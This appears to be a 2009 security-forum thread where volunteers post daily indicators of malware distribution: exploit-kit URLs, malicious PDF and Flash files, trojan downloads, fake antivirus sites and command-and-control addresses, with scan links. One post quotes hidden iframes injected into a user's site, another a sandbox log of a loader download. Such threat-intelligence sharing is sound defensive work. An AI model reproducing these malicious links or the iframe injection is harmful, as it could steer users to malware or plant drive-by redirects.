http://www.virustotal.com/analisis/b8fcb40a031230efbfaa9b3e0ff6e8a9

Redirects to rogue:
Code: [Select]
spyware-systems.info/0/go.php?sid=2
Exploit/trojan:
Code: [Select]
dr-w-corporation.ru/404/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=ceda3c3478def91606b1f1eff10aee05&t=1242931942&type=js
Title: Re: daily something......
Post by: Malware-Web-Threats on May 25, 2009, 12:37:40 am
redirects:
Code: [Select]
hxxp://tvnameshop.cn:8080/ts/in.cgi?pepsi19
exploits:
Code: [Select]
hxxp://litetopseeksite.cn:8080/index.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=11608bcd2beae11a346c7ce59dc1b66a&t=1243207563&type=js)
pdf:
Code: [Select]
hxxp://litetopseeksite.cn:8080/cache/readme.pdf
VirusTotal (http://www.virustotal.com/analisis/e0cc1067f80918d270ff280f5118f8d4c5d1f59a99ce9329aadafa8c859e8e0c-1243207236) - 10/40 (25.00%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=95c738bfe5a01b4cc30415d9368e2f9d&t=1243207896&type=js)
flash:
Code: [Select]
hxxp://litetopseeksite.cn:8080/cache/flash.swf
VirusTotal (http://www.virustotal.com/analisis/1feb0cc84665dfab4ebf8bf123ea106cbefc0967e7d0446a003c4411a5d4b42f-1243207241) - 11/39 (28.21%)
exe:
Code: [Select]
hxxp://litetopseeksite.cn:8080/load.php
VirusTotal (http://www.virustotal.com/analisis/284a014530738b8df40ad37d145eb3e1a547e51cb47461ee469269fa4df12fcb-1243207094) - 2/39 (5.13%)

Registrant: Scott Bell / ScottKBell@ missiongossip.com
Registrant: Michelle Rea / rea@ cybernauttech.com
Title: Re: daily something......
Post by: CkreM on May 25, 2009, 06:39:27 am
few trojans:
Code: [Select]
contempt.fileave.com/update.exe
http://www.virustotal.com/analisis/a9611719a2debd0ce94827725344b924b59a7dceb3b88a5a7373e63b21ea3a4a-1243232016
Code: [Select]
contempt.fileave.com/install_flash_player.exe
http://www.virustotal.com/analisis/7a0c6497ed0fedc5eb92b63f7c79d9f6fddaf93d6dcc92bb8c869bc9da354aa9-1243232028
Code: [Select]
contempt.fileave.com/update!!.exe
http://www.virustotal.com/analisis/eb6312bd3a633c4dc29bd3c6a8ed818034da1f9b619ef71e0beb549c4560dea8-1243232049
Code: [Select]
ebnetwork.biz/bot.exe
http://www.virustotal.com/analisis/36e867e35665340c782c1d029d4f812e78a2c1b9b06c8f65e11aa4ecf249efc2-1243232229

Koobface:
Code: [Select]
82.120.80.136/setup.exe
72.26.145.118/setup.exe

Exploit/trojan Murlo:
Code: [Select]
usrvzi.ru
http://wepawet.iseclab.org/view.php?hash=07cb0602a03e0538ce9e630d5881e8d2&t=1243233325&type=js

Fake AV loader:
Code: [Select]
stroika2009.ru/porn-tube.avi.exe
http://www.virustotal.com/analisis/15d4ed789d3872463614ff54804ddebc07ae67ea6ab44efd80937ede4f33191d-1243233171

Fake AV:
Code: [Select]
pornotubeonline10.com/scan/
Fake payment site:
Code: [Select]
2payon.com/pp/?id=356
Title: Re: daily something......
Post by: CkreM on May 26, 2009, 06:15:17 am
Trojan Emold:
Code: [Select]
interepass.com/ldr/main.exe
http://www.virustotal.com/analisis/49925c768805484b4fcd2eb62d0d72765b7b40c62cbe6cceaad4d2187eaac444-1243317300
Trojan:
Code: [Select]
89.149.242.25/cc/rf5.exe
http://www.virustotal.com/analisis/6626bc1283eb86b9afdf73ee4a24be67734fb0be1c81dda3e7d3731f77064c30-1243311118
Trojan:
Code: [Select]
us18.ru/d/1.exe
http://www.virustotal.com/analisis/21c89616b4b86dff6e1edf71c301a516b0dd477811bf7398a38743868a24e7db-1243311158
Trojan
Code: [Select]
pizdhelp.com/codec.exe
loyalbox.biz/codec.exe
http://www.virustotal.com/analisis/3f952397ee3a0fab7f828977e96d278be7e60f43de6f495c1fb7e7579cfcf616-1243317473

Fake av scan:
Code: [Select]
porno-online-tube.com/scan/
note4scan.info
greattoolset.com

Fake AV:
Code: [Select]
dwnld.showpromo-offer.com/secure/069d079c64e0350e7ba812895655fbf0/4a1b65bd/srm/srm_free_setup.exe
http://www.virustotal.com/analisis/af072ce2b07e627e27035e85bfd0ab74ac9de16b8166ef40d4b11455ecbe1b7e-1243317795
Redirects to fake AV:
Code: [Select]
trafdriver.com/in.cgi?10
Exploit/trojan:
Code: [Select]
freehostwap.com/in.php
http://wepawet.iseclab.org/view.php?hash=d89affb2687f08a4310d2e29a79d0b0f&t=1243320248&type=js
Title: Re: daily something......
Post by: sursmurf on May 26, 2009, 12:57:37 pm
PDF:
Code: [Select]
http://92.60.176.45/s/getfile.php?f=pdf
[5/39]
http://www.virustotal.com/analisis/c958c661bc404cd8f82ccad7143b82937eeebafd27226e80feef3b5ddd92ec99-1243341305

Trojan/dropper:
Code: [Select]
http://92.60.176.45/s/getexe.php?h=1
[7/39]
http://www.virustotal.com/analisis/e1b5d1b5c13891d274ec6fe17a405ec234a2368b2ee5720c4d53a508ff359465-1243341362
Title: Re: daily something......
Post by: sparsha on May 27, 2009, 02:53:05 am
Rogue Application related domains:

Code: [Select]
Angantivirus09.com
Ang-antivirus09.com
Angantivirus09.info


best-protect-av1.info
download.best-protect-av1.info


securityonlinesite.com/hitin.php?land=20&affid=20100
Title: Re: daily something......
Post by: CkreM on May 27, 2009, 03:26:31 am
Exploit/trojan:
Code: [Select]
leosex.org/nn/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=eb94cbec20844957ee85c8e95f272dfc&t=1243391424&type=js
Trojan (seemed like Virut to me)
Code: [Select]
ileron.cn/dll/abb.txt
http://www.virustotal.com/analisis/452e31c95952af674501a0519e63741568a1a3ba6267abc559b461812d761b70-1243392178
Trojan:
Code: [Select]
ileron.cn/dll/em.txt
http://www.virustotal.com/analisis/9b9871886640affa7fa13ebcb404540b10c862c9bf88372b184060f8eb2d1c37-1243392469
Title: Re: daily something......
Post by: CkreM on May 27, 2009, 06:44:23 am
Fake AV:
Code: [Select]
truesafetyweb.com
securityonlinesite.com
Title: Re: daily something......
Post by: Malware-Web-Threats on May 28, 2009, 06:21:58 am
70.85.142.250 - fa.8e.5546.static.theplanet.com

redirects:
Code: [Select]
thefilmmusic.cn:8080/ts/in.cgi?pepsi16
mynewnameshop.cn:8080/ts/in.cgi?pepsi25
usednamestore.cn:8080/ts/in.cgi?pepsi23
namebuyfilmlife.cn:8080/ts/in.cgi?pepsi23
mediahomenameshoppicture.cn:8080/ts/in.cgi?pepsi17
homenameworld.cn:8080/ts/in.cgi?pepsi17
technologybigtop.cn:8080/ts/in.cgi?pepsi17

exploits / trojan:
Code: [Select]
litetopdiscoversite.cn:8080/index.php
litetopdiscoversite.cn:8080/load.php
litetopfinddirect.cn:8080/index.php
litetopfinddirect.cn:8080/load.php
Title: Re: daily something......
Post by: CkreM on June 01, 2009, 08:06:51 am
PDF exploit:
Code: [Select]
cutlot.cn/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=175471e264f45086cc76d243f2d434da&t=1243755537&type=js
Flash exploit:
Code: [Select]
cutlot.cn/cache/flash.swf
http://wepawet.iseclab.org/view.php?hash=b3b47f2539fcd19831f1b69463f463aa&type=swf
the downloaded trojan (0 detections on VT)
Code: [Select]
bestlitediscover.cn:8080/landig.php?id=8
http://www.virustotal.com/analisis/cbdc2ddd3d050e55863f645efe12a3b55abec042a8d4f638788669e6431683b3-1243839114
communicates with
Code: [Select]
78.109.29.116/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=606178701&rnd=981633 (on MDL)


Code: [Select]
www.zbbey.com/n/
http://wepawet.iseclab.org/view.php?hash=47f6d25611621daf759de1bf372b9633&t=1243757577&type=js
PDF exploit:
Code: [Select]
www.zbbey.com/n/spl/pdf.pdf
http://wepawet.cs.ucsb.edu/view.php?type=js&hash=15b110fd28204a9b64716abda5cd6db5&t=1243757463
the downloaded trojan:
Code: [Select]
zbbey.com/n/exe.php
http://www.virustotal.com/analisis/11d539235f368547b20854cbbcfadee90c4c71d4c8a9e78fa6f6011b30f3f423-1243850579


Few trojans:
Code: [Select]
www.mcdonaldsuck.com/e/eg.exe
http://www.virustotal.com/analisis/6471bb8364de0ffc7775daa615631d226030280bcd4b8da40cb6ad8058e7b8b2-1243840368
Code: [Select]
www.mcdonaldsuck.com/e/sb.exe
http://www.virustotal.com/analisis/6ab0ac53f3c91abe493b9423fe71bb6f57ba728a9dd7f888d85ed117c4fe78ca-1243840496
Code: [Select]
www.mcdonaldsuck.com/e/238.exe
http://www.virustotal.com/analisis/097d7a0907216b6395f4e88a3b847cb15a17f4166367a7c2b42518dd3a4c8836-1243840661
Code: [Select]
www.mcdonaldsuck.com/e/ick.exe
http://www.virustotal.com/analisis/51f7ed9fa7f032ab1fd3acf7fc2eef55c62b15128b46d697405d67778093286a-1243840855
Code: [Select]
www.mcdonaldsuck.com/e/lich.exe
http://www.virustotal.com/analisis/ac62cbe52183d6f60f683548dde10dd1ba814fcab8ccc6aa3beadfb646c46bb7-1243841074
Code: [Select]
sotana.su/1.exe
http://www.virustotal.com/analisis/cb70d5e0ba1425ca49142a598528617846834aab9129677060d3568485d69080-1243841368
Code: [Select]
sexiland.ru/1.exe
http://www.virustotal.com/analisis/2a6c671dad587a06a18e751a3f22a0eb1659f73f915ec307dd65e2d59a5ae3c2-1243841184
Code: [Select]
sexiland.ru/bot.exe
http://www.virustotal.com/analisis/dc9913c8a788ce33a063de0f8d73c0e214eef3c6e63fc7a99fb8eff007f0cf06-1243841240
Code: [Select]
claremontfinance.org/voland.exe
http://www.virustotal.com/analisis/fc2c189b3242075ee4944afd6f4b60b7852dd73eea412ee20366cb082b16340d-1243841664
Code: [Select]
business-networks.info/data/images/ftp.exe
http://www.virustotal.com/analisis/eaa2a177b4e1b711b536a965bdf4bb1ba1eead4fca275dce6b124d5b87e9b824-1243841813
Code: [Select]
89.149.242.25/ededed3.exe
http://www.virustotal.com/analisis/76ef1bbe110c8ff041db0c67895d551769e9b85f08780c1242c6a2cc4026cdce-1243839486

Redirects to fake AV:
Code: [Select]
unmarine.info
powerball.3june2009.com
Fake AV:
Code: [Select]
counteringate.com/scan
loved-online-tube.com/scan/
first-antispyware.com/promo3/
the-best-antispyware.com/promo3/
Title: Re: daily something......
Post by: CkreM on June 01, 2009, 08:59:57 am
Exploits:
Code: [Select]
search-adverts.net/forum/index.php
http://wepawet.iseclab.org/view.php?hash=f2974b1a652fd3bc3fac456d5175e1ab&t=1243847198&type=js
PDF:
Code: [Select]
search-adverts.net/forum/cache/readme.pdf
Flash:
Code: [Select]
search-adverts.net/forum/cache/flash.swf
Koobface:
Code: [Select]
search-adverts.net/forum/load.php?id=4
http://www.virustotal.com/analisis/199690f5a30c1d9ff7d267cce6f7bab4b98195bdc8963a40c03f5146163a96a9-1243504185
Title: Re: daily something......
Post by: CkreM on June 02, 2009, 02:32:09 am
Rogue:
Code: [Select]
clean-windows-vista.com
registry-cleaner-2009.com/Setup.exe
Internet-explorer-cleaner.com/Setup.exe
registrycleanerpro.org/Setup.exe
http://www.virustotal.com/analisis/fa7bcca65a1c661f93a0a2d1031162e12a4c27d86f49686e65a02d40762f74f8-1243909438 (1/40)
The payment site (the site seems legit and just offers its services):
Code: [Select]
plimus.com/jsp/buynow.jsp?contractId=2261798&templateId=678656
Title: Re: daily something......
Post by: CkreM on June 02, 2009, 06:51:06 am
Few Trojans:
Code: [Select]
avhtm.8866.org/files/av.exe
http://www.virustotal.com/analisis/969c0f517f279dd68898eea50bb9ce51092acc3eca79fe963500b82f5c0d222a-1243923005
Code: [Select]
091809.ru/bot.exe
http://www.virustotal.com/analisis/eabf8925b5e73d4a8c1ef091108c2144a506f953c2e392588d2b5c05189dc698-1243924307
Trojan Koobface:
Code: [Select]
videofx4you1.com/software/019d135faa/10180/1/Setup.exehttp://www.virustotal.com/analisis/e585df3a2b91e56951ecd6a03c73fd7b45b02e0ca2278130438b6467e823e202-1243924387
Code: [Select]
ultraphobia.com/ppcfile/godsname.exehttp://www.virustotal.com/analisis/8018cf6b613911e75f0a9f326bb4d18b86f3543cab781b21fa49893483c37804-1243924788
Code: [Select]
ultraphobia.com/ppcfile/freeserfer.exehttp://www.virustotal.com/analisis/da4177f7cec2b60dae6e7d67944b5ff54273c6d70549d63c4c6de584abece4a6-1243924927
Trojan Pinch:
Code: [Select]
treelives.cn/pnc/pexe.exehttp://www.virustotal.com/analisis/c0deb27bd735c3936bd84bd67d60b3c5450bffb6f051eb170370afb965a0dad1-1243925125

Exploits:
Code: [Select]
s76z.cn/data/
http://wepawet.iseclab.org/view.php?hash=7bb7e6ca87c21a4310f276e54db9e102&t=1243847990&type=js
PDF:
Code: [Select]
s76z.cn/data/spl/pdf.pdf
Trojan Oficla:
Code: [Select]
s76z.cn/data/exe.php
http://www.virustotal.com/analisis/02c22fc3cd292700557f0a125a544225a51839754f3ad886ba38788f8e5aaa3f-1243815948

Exploits:
Code: [Select]
treelives.cn/ru/index.php
http://wepawet.iseclab.org/view.php?hash=db13b96a3f07c2433da03c406fa21000&t=1243849201&type=js
PDF:
Code: [Select]
treelives.cn/ru/iepdf.php?f=new
Trojan Oficla:
Code: [Select]
treelives.cn/ru/load.php
http://www.virustotal.com/analisis/bcb7eb7c10a161a08a16249e653bfcd0c26ac97941ac5760525c27edadf383d8-1243796149
Title: Re: daily something......
Post by: SysAdMini on June 02, 2009, 07:10:35 pm
iframe directs to pfre.php
Code: [Select]
lgmin.com/image/index.php
pdf exploit
Code: [Select]
lgmin.com/image/pfre.php
payload is
Code: [Select]
http://lgmin.com/image/ouet.php
http://www.virustotal.com/analisis/27b6a8bd0b5ccdd6d621cec888108f6c4f6f809319fad724f5c6f1aa94124a39-1243963662 3/40
CAT-QuickHeal   10.00   2009.06.02   (Suspicious) - DNAScan
Microsoft   1.4701   2009.06.02   VirTool:Win32/Obfuscator.FH
Symantec   1.4.4.12   2009.06.02   Suspicious.MH690.A
http://www.threatexpert.com/report.aspx?md5=995a4928b9d1da62bcda2c1db6dd4898

AdPack cpanel is
Code: [Select]
lgmin.com/image/admin.php
same kind of stuff can be found at fastinate.com/image/...
Title: Re: daily something......
Post by: sparsha on June 03, 2009, 09:20:49 am
Sites related to Rogue Security Application

Code: [Select]
http://deluxe-protector.com/setup.exe
http://softwaredownloadcentercom.com/xpdel.exe

http://liveicqnetwork.cn/go.php?id=2018&key=56d5f0bd3&p=1
http://pricelessfinish.cn/go.php?id=2018-04&key=56d5f0bd3&p=1

http://pro-antivirus-scannerv2.com/1/?id=2018&smersh=c144eb244&back==TQ0yzz5McQNMI=M

http://safetywww.com/hitin.php?land=20&affid=20100
http://personal-antivirus-software.com/promo3/?aid=851
Title: Re: daily something......
Post by: SysAdMini on June 03, 2009, 09:08:11 pm
directs to "Messenger Infium" (trojan)
Code: [Select]
msnm.3eu.ru
Code: [Select]
albatros.ee/uploades/scr_dn/MInfium2009Final.exe
http://www.virustotal.com/analisis/9075621fd2b778431b576b9fef8ece2af86ff98f2f1516b62078f26b700f17c2-1244062941 2/40
K7AntiVirus   7.10.752   2009.06.02   Trojan.Win32.Malware.1
TheHacker   6.3.4.3.338   2009.06.03   Trojan/Agent.cikm
Title: Re: daily something......
Post by: CkreM on June 04, 2009, 08:37:07 am
Exploit (wepawet seems to fail on this one)
Code: [Select]
091809.ru/s/in.php
PDF:
Code: [Select]
091809.ru/s/pdf.php
http://wepawet.iseclab.org/view.php?hash=f5b00bed476324a303df8f4b4d8ac8c1&t=1244100976&type=js
seems like a bit altered variant of Emold trojan:
Code: [Select]
091809.ru/s/load.php?id=3
http://www.virustotal.com/analisis/05e9c38100c6d59e834be1b848ab824eefe741d358e969d5e11cf6853d6ab7f5-1244100358

FTPstealer:
Code: [Select]
club25plus.de/css/vv.exe
http://www.virustotal.com/analisis/1db0daee62d2103eab7c84383e05505b6d6612aaef14da7641f1ceabd6d2f65a-1244101252
Trojan:
Code: [Select]
club25plus.de/css/frfr5.exe
http://www.virustotal.com/analisis/e8165bde7ebbcd65464ee27f7121128885e91b373ce83a3adb53e1e1975ec5d8-1244101967

Fake AV:
Code: [Select]
tubepornolive.com/scan/
Exploits:
Code: [Select]
bfegrtuker.ru/bede/in.php
http://wepawet.iseclab.org/view.php?hash=09d36363e30de64fc262c747c8e54d68&t=1244102863&type=js
PDF:
Code: [Select]
bfegrtuker.ru/bede/its/0.pdf
Flash:
Code: [Select]
bfegrtuker.ru/bede/its/0.swf
Trojan Oficla:
Code: [Select]
bfegrtuker.ru/bede/load.php?id=5
Trojan:
Code: [Select]
000007.ru/1007.exe
http://www.virustotal.com/analisis/b35aec13c9d8d5b92fd3ba42eb753f36a89b1798dfcd1068c62243f9d0e38e04-1244102905
Trojan:
Code: [Select]
234871938123.cn/svcshostes.exe
http://www.virustotal.com/analisis/80fb3f643f85d8f09f3e5f533a52917dfae9c6e009899602577b6113dabf0ec7-1244103136

Trojans (all seem to be Rustock):
Code: [Select]
yayandex.com/1.exe
http://www.virustotal.com/analisis/c9ab5cd07f75505444777caebc1ba203c4d6a3cfa079516f5b231f5cbea4cb6c-1244103292
Code: [Select]
yayandex.com/2.exe
http://www.virustotal.com/analisis/34f7a41324eaaaefd45357ed16f89b8a9add7e839c54fc4897610fc831e56a44-1244103465
Code: [Select]
yayandex.com/3love.exe
http://www.virustotal.com/analisis/1f0f682ac26bc3c2c3d3153b282e09e68c97277b0dfc49f3a97519d42033410d-1244103873
all communicate with:
Code: [Select]
yabombs.com/1/getcfg.php
Title: Re: daily something......
Post by: sparsha on June 04, 2009, 07:12:40 pm
Fake/Scare scanner

Code: [Select]
http://antimalwareliveproscannerv3.com/1/?id=2018&smersh=c144eb244&back==TQ2yTDxNMQOMI=N
Fake flash player - downloads Rogue

Code: [Select]
http://big-pornnet.com/promo1/get.php?aid=780&vname=flash_player_v11
Couple of links on the rotators

Code: [Select]
http://top-pornnet.com/promo3/?aid=763&vname=flash_player.exe
http://mybig-portal.com/promo3/?aid=763&vname=protect.exe
Title: Re: daily something......
Post by: CkreM on June 07, 2009, 06:07:13 am
Fake movie page:
Code: [Select]
tube-xxx-work.com/xplays.php?id=40016
downloads:
Code: [Select]
exe-web-development.com/streamviewer.40016.exe
http://www.virustotal.com/analisis/76b8a3599fc04cfe7adecab36805615f82b7e73c8b8980f2ecbb3cd94cee5ba3-1244350815

Fake AV:
Code: [Select]
mysex-adult.com/promo1/soft/install-1557.exe
Rustock:
Code: [Select]
rarambler.com/ra/2.exe
http://www.virustotal.com/analisis/a67f6dcc6c43deaa623d88882cf591f742552615cc59cd3620cda86dbbbc618e-1244353129
Communicates with:
Code: [Select]
systemjud.com/start/admo/getcfg.php
Title: Re: daily something......
Post by: SysAdMini on June 07, 2009, 01:20:34 pm
Today a user reported the following:

Code: [Select]
i found these two in my site:

<iframe src="http://85.10.221.161/in.cgi?2" width="0" height="0" frameborder="0"></iframe>

<iframe src="http://global-analitics.com/in.cgi?2" width="0" height="0" frameborder="0"></iframe>

Code: [Select]
85.10.221.161/in.cgi?2
redirects to multiple exploits at

Code: [Select]
searchsuggest.cn/catalog/x.php?q=1
payload is
Code: [Select]
searchsuggest.cn/catalog/q.php?s=2
http://www.virustotal.com/analisis/ad7686eb5e40fa0b4a874bf06a605f2ed44e6a17a7e7df48c7c25064c42f400a-1243633951

I'm unable to download it from my machine, don't know why.

The other URL
Code: [Select]
global-analitics.com/in.cgi?2
doesn't seem to work at the moment.
Title: Re: daily something......
Post by: MysteryFCM on June 07, 2009, 02:37:53 pm
Payload:

/catalog/bookz.pdf
http://www.virustotal.com/analisis/3fcbd6e988183b20a18c13f6125d41bc6ee346c7dd5a198bee4e5de8fdabc927-1244385255

/catalog/next.exe
http://www.virustotal.com/analisis/ad7686eb5e40fa0b4a874bf06a605f2ed44e6a17a7e7df48c7c25064c42f400a-1244385214

I was only able to grab them by feeding it the correct referer (x.php?q=1)

I can't get the other one to work either .....
Title: Re: daily something......
Post by: sparsha on June 08, 2009, 07:37:18 pm
System Security rogue related sites

Code: [Select]
Title: Re: daily something......
Post by: XiTri on June 09, 2009, 05:07:16 am
Code: [Select]
http://e-point.com.ua/ratingz/load.php
Kaspersky - Trojan-Banker.Win32.Banker.aflq
McAfee verdict: PWS-Banker
Title: Re: daily something......
Post by: sparsha on June 09, 2009, 10:42:20 am
Win PC Defender rogue
Code: [Select]
http://pornotube911.com/codec/186.exe
http://downloadfixandlove.com/pcdef.exe
http://downloadfixandlove.com/file.exe

Antivirus System Pro
Code: [Select]
antivir2009pro.com
Inetantivir.com
Inetantivirus.com
Inetavirus.com
209.44.111.57/block.php?r=8.0
Title: Re: daily something......
Post by: promised on June 09, 2009, 11:08:00 am
onlinegames
Title: Re: daily something......
Post by: promised on June 09, 2009, 11:09:59 am
onlinegames
Title: Re: daily something......
Post by: sparsha on June 09, 2009, 11:44:46 am
Code: [Select]
http://av-guard.net/?uid=102&pid=3
Title: Re: daily something......
Post by: promised on June 09, 2009, 06:56:24 pm
onlinegames
Title: Re: daily something......
Post by: promised on June 09, 2009, 06:58:24 pm
Title: Re: daily something......
Post by: CM_MWR on June 09, 2009, 07:27:36 pm
FO
Title: Re: daily something......
Post by: promised on June 10, 2009, 04:55:05 am
Quote
hxxp://alfafoxx.com/temp/find26.exe
hxxp://alfafoxx.com/temp/ret26.exe
hxxp://alfafoxx.com/temp/ldr26.exe
hxxp://www.alfafoxx.com/mldr/data/mbt.exe
Title: Re: daily something......
Post by: sursmurf on June 10, 2009, 08:51:36 pm
Trojan:
Code: [Select]
hXXp://mediahousenamebuyvideo.cn:8080/load.php
VT 8/40
http://www.virustotal.com/sv/analisis/93a126695d599d3c50147010fe2f337155f211b8fd43256e9ec89c77e4ed84bb-1244666759

PDF:
Code: [Select]
hXXp://mediahousenamebuyvideo.cn:8080/cache/readme.pdf
VT 15/40
http://www.virustotal.com/sv/analisis/948c50b18fcd2a2f71faf6257fcddcdacfa5ed55af17ceafecced4bdd8ebab8a-1244666624

Flash:
Code: [Select]
hXXp://mediahousenamebuyvideo.cn:8080/cache/flash.swf
VT 22/39
http://www.virustotal.com/sv/analisis/8fa7088e7dae6ff5f9c4f5eaff14de22e2198b28946472486a5045e44d0d5b5d-1244666646
Title: Re: daily something......
Post by: promised on June 11, 2009, 05:24:08 am
banker
Quote
hxxp://71.174.51.86/images/logout.jpg
Title: Re: daily something......
Post by: Malware-Web-Threats on June 11, 2009, 05:43:25 am
VirusTotal (http://www.virustotal.com/analisis/01f8a46219acc32a149b4707bca32dfcca1d88fd794a27266a8f071a2845aea2-1244687707)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=fae47a0d3048e1609c253994ea368e79)
Quote
hxxp://78.109.29.116/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=13441600&rnd=981633
Title: Re: daily something......
Post by: Malware-Web-Threats on June 11, 2009, 09:12:40 am
redirects by telemedia.m77s[.]cn:
Wepawet (http://wepawet.iseclab.org/view.php?hash=d33a97ac078bb1833726bfcfbe9b9650&t=1244705876&type=js)

exploits:
Code: [Select]
f97q.cn/images/index.php
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=9b458aab745351364b38a99f25e11da7&t=1244704241)

pdf:
Code: [Select]
f97q.cn/images/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=d0cb3cb6a3061e3a2c7e0ce31f5bb788&t=1244706026&type=js)

trojan:
Code: [Select]
f97q.cn/images/exe.php
VirusTotal (http://www.virustotal.com/analisis/612022bd60334f8b1b79d5887d5515fda41cda55340bfd9f516ae041f89a519a-1244561761) - 6/40 (15.00%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1fb5448a0ba130c0445cee1879e067d03&format=html)

Quote
From ANUBIS:1032 to 78.109.25.217:80 - [r99u.cn] 
Request: GET /myl/464664.php?id=470261258&v=101&tm=33&b=9671316727 
Response: 200 "OK" 
Request: GET /myl/exe/loader.exe 
Response: 200 "OK"
 
Title: Re: daily something......
Post by: CkreM on June 11, 2009, 03:27:25 pm
Trojan:
Code: [Select]
fer5woi.ru/1t.exe
Trojan:
Code: [Select]
dirtylivesex.net/fuflo_v1.exe
http://www.virustotal.com/analisis/4784550551e642a6f133bfec4877af63a801d48f01e7fa6c33378abf1ed167e9-1244732363
Trojan:
Code: [Select]
rezident77.ru/files/s66.exe
http://www.virustotal.com/analisis/403f79bd1e23384be42728583872ba6eb43621db55c7a7aaea242f79938f8f24-1244732262

Exploits:
Code: [Select]
domainzzoom.ru/in.php
http://wepawet.iseclab.org/view.php?hash=dacf686bc48b5f9aec70cc8cbc6b248e&t=1244731801&type=js
PDF:
Code: [Select]
domainzzoom.ru/pdf.php
fake AV:
Code: [Select]
domainzzoom.ru/load.php?id=2
http://www.virustotal.com/analisis/d1c8dea9489502866622d1d45d0a0fe80eb06ede51b32484711416a96cd1df1f-1244731949

fake payment site:
Code: [Select]
securebillingsoftware.com/buy.php?affid=03500
Title: Re: daily something......
Post by: Malware-Web-Threats on June 12, 2009, 09:42:03 pm
redirects:
Code: [Select]
thelotmachine.cn:8080/in.cgi
thenetnameshop.cn:8080/in.cgi
compoundcapitolgroup.cn:8080/in.cgi
mixlotworld.cn:8080/in.cgi
superlottry.cn:8080/in.cgi
webnamemart.cn:8080/in.cgi

payloads:

exe:
http://www.virustotal.com/analisis/25db455ed35b759dc3a6924359bd72c37f9cc3b13edac98a96894e344d45078d-1244797876
http://anubis.iseclab.org/?action=result&task_id=1c7642f4324780a04014ee1900012c257

pdf:
http://wepawet.iseclab.org/view.php?hash=d21d612330db155dcbd75191a9b7c021&t=1244801268&type=js

flash:
http://wepawet.iseclab.org/view.php?hash=3e05fc4fd1c7a49f8478da9c76c7c435&type=swf
http://www.virustotal.com/analisis/8fa7088e7dae6ff5f9c4f5eaff14de22e2198b28946472486a5045e44d0d5b5d-1244133184

http://www.threatexpert.com/report.aspx?md5=7264e961f25beaa201906e4086caa1ce
Title: Re: daily something......
Post by: bobby on June 14, 2009, 08:02:43 pm
Code: [Select]
http://nyfilmlife.cn:8080/index.php
leads to:
Code: [Select]
http://gianttoplocate.cn:8080/load.php?id=0
http://gianttoplocate.cn:8080/load.php?id=1
http://nyfilmlife.cn:8080/cache/readme.pdf
http://nyfilmlife.cn:8080/cache/flash.swf
http://gianttoplocate.cn:8080/landig.php?id=4
Title: Re: daily something......
Post by: CM_MWR on June 15, 2009, 06:28:40 am
FO
Title: Re: daily something......
Post by: CkreM on June 15, 2009, 07:16:21 am
Fake AV:
Code: [Select]
pornotube912.com/scan/
Trojan:
Code: [Select]
194.33.180.41/rferfref5.exe
http://www.virustotal.com/analisis/5859892e44a0ab804ea7ec37b6313f089e2f47d87ee83c3528e84ccdea35e4a8-1245048501

Exploits:
Code: [Select]
rtm-books.co.uk/ad/index.php
http://wepawet.iseclab.org/view.php?hash=7bba4edc1abb1608785379e50afad535&t=1245048299&type=js
PDF:
Code: [Select]
rtm-books.co.uk/ad/include/two.pdf
Trojan:
Code: [Select]
rtm-books.co.uk/ad/load.php
http://www.virustotal.com/analisis/4a92f221548e9c84903ab15ec49281ffd16f0c74ee4e075bbaab48f6dbeb8c19-1245048374

Exploits:
Code: [Select]
viva-delpinata2.com/2/index.php
http://wepawet.iseclab.org/view.php?hash=cf45d657fe06a83f99b2d6518f4714ca&t=1245048311&type=js
PDF:
Code: [Select]
viva-delpinata2.com/2/notTheoryCites.pdf
Flash:
Code: [Select]
viva-delpinata2.com/2/normalLeap.swf
Trojan:
Code: [Select]
viva-delpinata2.com/2/update.php
http://www.virustotal.com/analisis/3b21cb087180f5d3cc067d9fd8198b745635130038aa5587d7e3b1f4e9ee37c8-1245022898
Title: Re: daily something......
Post by: sparsha on June 15, 2009, 03:56:03 pm
New Rogue sites
Code: [Select]

protectionsystem.org
protectionsystemlab.com/psystem.exe

Core-guard-antivirus.com
fullguardlab.com
fullprotect.org

http://gosoonscan.com/?uid=13002
http://planscan4.info/download/install.php

http://ina4id.com/download/InternetAntivirusPro.exe
http://ina4id.com/download/file.exe

Title: Re: daily something......
Post by: CkreM on June 15, 2009, 04:35:48 pm
AV downloader
Code: [Select]
joomlaprojects.cn/file.exe
http://www.virustotal.com/analisis/a56d5fcf47517f96978014bee0d1ca5a67be4d9d2725643c9f91e947f2d48c1e-1245081896

Fake AV:
Code: [Select]
antivirus-2009-ppro.com/cgi-bin/download.pl?code=0000282
http://www.virustotal.com/analisis/078c85cd91583f821aaf3d8c5588785fab192d32ae09a7fad5da0f45e668e2c7-1245082096
Code: [Select]
joomlaprojects.cn/install.exe
http://www.virustotal.com/analisis/7f041ff1df6e693585fdf1c5be1fb39c2de3d1c0f358ae35612c48da39ebbda9-1245082461
Code: [Select]
haos-in.ru/3_install.exe
http://www.virustotal.com/analisis/c60c9f6772c6416c366783b5edf8c96b619fcd86bdafdcb737bcd388cd7d668c-1245084099


Fake payment sites:
Code: [Select]
advanced-virusremover2009.com/buy/?code?code=0000282
https://www.securebillingsoftware.com/buy.php?affid=05100   (works with https only)

Trojan:
Code: [Select]
onuka.cn/dll/em.txt
http://www.virustotal.com/analisis/d979c2f805ce2e01d21e49aad39e3ff0f2aa7e98c86b0e5671a7c4868bfa5640-1245082890
Trojan:
Code: [Select]
218.6.12.82/winrar.exe
http://www.virustotal.com/analisis/b687f6673db5072334cb6a13f6d59f303cf3302258939b93403fb26bbae6e984-1245083262
Title: Re: daily something......
Post by: Malware-Web-Threats on June 16, 2009, 12:37:14 am
redirects:
Code: [Select]
globalmixgroup.cn:8080/in.cgi

payloads:

VirusTotal (http://www.virustotal.com/analisis/e85beb2ea40aac707863221ce5189863288583550453b5ad3c19aa31aa2c6f9a-1245076415): 1/40
